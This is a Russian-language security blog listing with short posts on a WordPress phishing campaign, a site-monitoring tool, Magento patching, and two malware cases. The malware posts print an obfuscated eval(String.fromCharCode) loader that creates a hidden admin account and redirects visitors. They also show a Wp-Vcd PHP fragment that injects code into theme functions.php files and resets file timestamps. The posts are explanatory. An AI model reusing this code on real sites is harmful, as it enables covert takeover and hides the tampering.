БЛОГ


Давно не писал, лето, знаете ли

По сообщению компаний, работающих в сфере IT безопасности, с начал сентября зафиксирована необычная технология кражи паролей Wordpress при помощи рассылки фишинговых писем.

Поддельное письмо выглядит как стандартное сообщение рассылки wordpress.org администраторам сайтов о необходимости обновления, стоит заметить, что  используемое оформление  соответствует устаревшим версиям CMS.

Опубликовано в БЛОГ

Наверное, многим знакома ситуация, когда из-за взлома сайт перестает работать, вроде бы «откатиться» на резервную копию, но взлом сайта произошел давно, и все резервные копии оказываются зараженными. К тому же о проникновении на сайт хочется узнавать незамедлительно, а не когда для восстановления приходится тратить много сил и времени. Сразу оговорюсь, для полной автоматизации придется купить плагин за 10 долларов, что не сумма для любого проекта.

Настройка

Загружаем компонент с сайта разработчика, установка стандартна. Единственное замечание, русификация компонента сейчас сделана не полностью, полную версию можно загрузить с нашего сайта, перевод будет включен в состав следующего дистрибутива.

Отрываем в админ панели - компоненты, site:

Опубликовано в БЛОГ

В данном материале будет показан способ альтернативного обновления Magento , статья переводная.

Для популярного движка электронной коммерции Magento 28 сентября 2017 года был выпущен патч 10415 SUPEE 1.9.3.7 для решения нескольких критических проблем безопасности, таких как удаленное выполнение произвольного кода, межсайтовый скриптинг и так далее.

До сих пор не все владельцы ресурсов  обновили свои сайты, основная причина – использование SSL для установки обновлений, что и является основным препятствием для обновления.

Компания Magecomp предлагает альтернативный способ наложения патчей и рекомендует как можно скорее установить их, чтобы защитить Magento от возможных угроз безопасности.

Опубликовано в БЛОГ

В этом месяце специалистами компании Sucuri необычный способ распространения зловредного кода через JavaScript из браузера посетителя. Хотя используется давно известная уязвимость не обновлённой темы News Magazine Newspaper , но метод заслуживает описания.

На уязвимые сайты загружается вредоносный код:

eval (String.fromCharCode (118, 97, 114, 32, 115, 115, 99 ...

После того, как посетитель заходит на зараженный сайт, Javascript проверяет, зарегистрирован ли посетитель в качестве администратора, обратившись к файлу /wp-admin/user-new.php в теневом режиме. Если пользователь является администратором, он создает пользователя с именем simple001 и с электронной почтой simple @ simplesite .com  с правами администратора.

Если посетитель не зарегистрирован как admin, javascript проверяет, является ли это первым посещением за последние десять часов (проверяя файл cookie checkmeonce), а затем перенаправляет на адрес hxxps: //for.stringengines [.] Com /sp.php?at=57&bc=345&rps=5467854&sty=457&get=75 .

Этот URL-адрес промежуточный в  цепочке перенаправления на фишинговые и сайты рекламного содержания. Перенаправления, как правило, на один и тот же сайт делается один раз, чаще всего на домены в зоне  .tk обозначенными как  «техническая поддержка» и случайными символами в имени домена, такими как 3cal1ingc0nstant31112123 [.] Tk или techsupport60512123456 [.] Tk .

Опубликовано в БЛОГ

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

Опубликовано в БЛОГ